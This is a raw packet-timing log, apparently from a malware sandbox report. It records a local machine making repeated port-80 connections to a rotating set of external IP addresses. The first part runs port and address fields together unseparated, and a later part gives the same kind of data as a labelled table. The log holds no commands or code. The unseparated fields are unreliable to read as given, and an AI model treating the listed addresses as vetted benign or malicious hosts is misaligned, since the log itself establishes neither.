                                                      Dec 3, 2024 06:54:50.368949890 CET4977680192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:50.371443033 CET4977680192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:50.491422892 CET8049776103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:55.873399019 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:55.993355036 CET8049793185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:55.993438005 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:56.005814075 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:56.125901937 CET8049793185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:57.242728949 CET8049793185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:57.242804050 CET8049793185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:57.242856026 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:57.514556885 CET4979380192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:58.536803007 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:58.656794071 CET8049801185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:58.656873941 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:58.670360088 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:54:58.790397882 CET8049801185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:59.951869011 CET8049801185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:59.951994896 CET8049801185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:54:59.952151060 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:00.186577082 CET4980180192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:01.204765081 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:01.324784994 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.324995041 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:01.337131023 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:01.457190990 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457242012 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457328081 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457364082 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457437038 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457470894 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457487106 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457505941 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:01.457515001 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:02.622072935 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:02.622208118 CET8049809185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:02.622282028 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:02.842816114 CET4980980192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:03.861325026 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:03.981264114 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:03.981463909 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:03.990909100 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:04.111037970 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:05.230115891 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:05.230159044 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:05.230253935 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:05.232871056 CET4981480192.168.2.4185.27.134.206
                                                      Dec 3, 2024 06:55:05.353441000 CET8049814185.27.134.206192.168.2.4
                                                      Dec 3, 2024 06:55:11.599803925 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:11.719916105 CET8049833106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:11.720071077 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:11.740147114 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:11.860726118 CET8049833106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:13.249034882 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:13.369199991 CET8049833106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:13.369260073 CET4983380192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:14.267214060 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:14.387238979 CET8049839106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:14.387330055 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:14.402816057 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:14.523427010 CET8049839106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:15.905246019 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:16.025541067 CET8049839106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:16.025594950 CET4983980192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:16.923516035 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:17.043486118 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.043709993 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:17.057569027 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:17.177867889 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.177886009 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.177959919 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.177987099 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178083897 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178100109 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178222895 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178232908 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:17.178260088 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:18.561670065 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:18.682050943 CET8049847106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:18.682131052 CET4984780192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:19.580080032 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:19.700156927 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:19.701606989 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:19.709201097 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:19.829268932 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370456934 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370481014 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370492935 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370587111 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.370634079 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370646954 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370659113 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370670080 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:24.370680094 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.370692015 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.370727062 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.375252962 CET4985480192.168.2.4106.15.109.33
                                                      Dec 3, 2024 06:55:24.495122910 CET8049854106.15.109.33192.168.2.4
                                                      Dec 3, 2024 06:55:30.008497953 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:30.128842115 CET804987845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:30.128972054 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:30.143064976 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:30.262993097 CET804987845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:31.485246897 CET804987845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:31.485354900 CET804987845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:31.485415936 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:31.655334949 CET4987880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:32.673402071 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:32.793349028 CET804988545.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:32.793428898 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:32.805386066 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:32.925352097 CET804988545.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:34.106460094 CET804988545.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:34.106576920 CET804988545.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:34.106621981 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:34.311690092 CET4988580192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:35.330172062 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:35.450126886 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.450229883 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:35.462796926 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:35.582904100 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.582914114 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.582953930 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.582972050 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.582986116 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.583072901 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.583086014 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.583205938 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:35.583214998 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:36.784461021 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:36.827131987 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:36.908219099 CET804989245.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:36.908268929 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:36.967853069 CET4989280192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:37.993747950 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:38.114120007 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:38.114209890 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:38.123507977 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:38.243422985 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:39.512082100 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:39.512331963 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:39.512378931 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:39.514486074 CET4989880192.168.2.445.141.156.114
                                                      Dec 3, 2024 06:55:39.634340048 CET804989845.141.156.114192.168.2.4
                                                      Dec 3, 2024 06:55:45.240114927 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:45.360025883 CET804991623.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:45.360105038 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:45.372932911 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:45.493299007 CET804991623.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:46.571362972 CET804991623.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:46.624044895 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:46.644608021 CET804991623.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:46.644782066 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:46.884219885 CET4991680192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:47.892529011 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:48.015373945 CET804992223.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:48.015475035 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:48.029781103 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:48.150557041 CET804992223.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:49.212785006 CET804992223.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:49.264702082 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:49.283982038 CET804992223.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:49.284099102 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:49.549072027 CET4992280192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:50.564711094 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:50.684602022 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.684787989 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:50.698746920 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:50.818772078 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818799973 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818902016 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818912029 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818943977 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.818953037 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.819053888 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.819063902 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:50.819097996 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:51.881123066 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:51.936569929 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:51.948946953 CET804993123.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:51.949013948 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:52.203569889 CET4993180192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:53.221425056 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:53.341540098 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:53.341645956 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:53.350812912 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:53.470740080 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:54.586163044 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:54.639699936 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:54.656505108 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:55:54.656603098 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:54.659619093 CET4993780192.168.2.423.225.159.42
                                                      Dec 3, 2024 06:55:54.779649973 CET804993723.225.159.42192.168.2.4
                                                      Dec 3, 2024 06:56:00.058098078 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:00.178118944 CET8049953172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:00.178195000 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:00.190475941 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:00.310336113 CET8049953172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:01.702394962 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:01.822707891 CET8049953172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:01.822786093 CET4995380192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:02.721461058 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:02.841449976 CET8049959172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:02.842916965 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:02.857264042 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:02.977219105 CET8049959172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:04.358645916 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:04.479209900 CET8049959172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:04.479293108 CET4995980192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:05.377161980 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:05.497133970 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.497237921 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:05.511126041 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:05.631156921 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631200075 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631256104 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631300926 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631347895 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631371021 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631479979 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631489992 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:05.631515980 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:07.015799046 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:07.136001110 CET8049966172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:07.136054993 CET4996680192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:08.033955097 CET4997180192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:08.154021978 CET8049971172.67.187.114192.168.2.4
                                                      Dec 3, 2024 06:56:08.155400038 CET4997180192.168.2.4172.67.187.114
                                                      Dec 3, 2024 06:56:08.170773983 CET4997180192.168.2.4172.67.187.114
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 06:56:08.290687084 CET | 80 | 49971 | 172.67.187.114 | 192.168.2.4
Dec 3, 2024 06:56:10.202681065 CET | 80 | 49971 | 172.67.187.114 | 192.168.2.4
Dec 3, 2024 06:56:10.202702999 CET | 80 | 49971 | 172.67.187.114 | 192.168.2.4
Dec 3, 2024 06:56:10.202817917 CET | 49971 | 80 | 192.168.2.4 | 172.67.187.114
Dec 3, 2024 06:56:10.203730106 CET | 80 | 49971 | 172.67.187.114 | 192.168.2.4
Dec 3, 2024 06:56:10.207339048 CET | 49971 | 80 | 192.168.2.4 | 172.67.187.114
Dec 3, 2024 06:56:10.208237886 CET | 49971 | 80 | 192.168.2.4 | 172.67.187.114
Dec 3, 2024 06:56:10.328195095 CET | 80 | 49971 | 172.67.187.114 | 192.168.2.4
Dec 3, 2024 06:56:15.729088068 CET | 49989 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:15.964514971 CET | 80 | 49989 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:15.964632988 CET | 49989 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:15.984447002 CET | 49989 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:16.104440928 CET | 80 | 49989 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:17.109770060 CET | 80 | 49989 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:17.109848022 CET | 49989 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:17.499345064 CET | 49989 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:17.619374990 CET | 80 | 49989 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:18.518222094 CET | 49997 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:18.638115883 CET | 80 | 49997 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:18.638186932 CET | 49997 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:18.655059099 CET | 49997 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:18.775233030 CET | 80 | 49997 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:19.737071037 CET | 80 | 49997 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:19.737448931 CET | 49997 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:20.171174049 CET | 49997 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:20.292370081 CET | 80 | 49997 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.190046072 CET | 50004 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:21.310161114 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.310396910 CET | 50004 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:21.325094938 CET | 50004 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:21.445164919 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.445178986 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.445236921 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.445245981 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.445337057 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.445346117 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.445357084 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.445401907 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:21.445455074 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:22.506912947 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:22.506999969 CET | 50004 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:22.827370882 CET | 50004 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:22.947232008 CET | 80 | 50004 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:23.846153975 CET | 50011 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:23.966428995 CET | 80 | 50011 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:23.966650009 CET | 50011 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:23.976130962 CET | 50011 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:24.096321106 CET | 80 | 50011 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:25.157572985 CET | 80 | 50011 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:25.157670021 CET | 80 | 50011 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:25.157717943 CET | 50011 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:25.160360098 CET | 50011 | 80 | 192.168.2.4 | 13.248.169.48
Dec 3, 2024 06:56:25.280319929 CET | 80 | 50011 | 13.248.169.48 | 192.168.2.4
Dec 3, 2024 06:56:30.605834961 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:30.725820065 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:30.725899935 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:30.740322113 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:30.861100912 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052464962 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052531958 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052546024 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052586079 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:32.052683115 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052732944 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:32.052746058 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052858114 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052867889 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052877903 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052886009 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052895069 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.052907944 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:32.052953959 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:32.173650026 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.173662901 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.173728943 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:32.177680969 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.218107939 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:32.249316931 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:32.263092041 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.263113022 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.263202906 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:32.263202906 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:32.265629053 CET | 80 | 50027 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:32.265686989 CET | 50027 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:33.268234015 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:33.390620947 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:33.390722990 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:33.402578115 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:33.523256063 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716044903 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716110945 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716126919 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716160059 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:34.716269016 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716279030 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716288090 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716298103 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
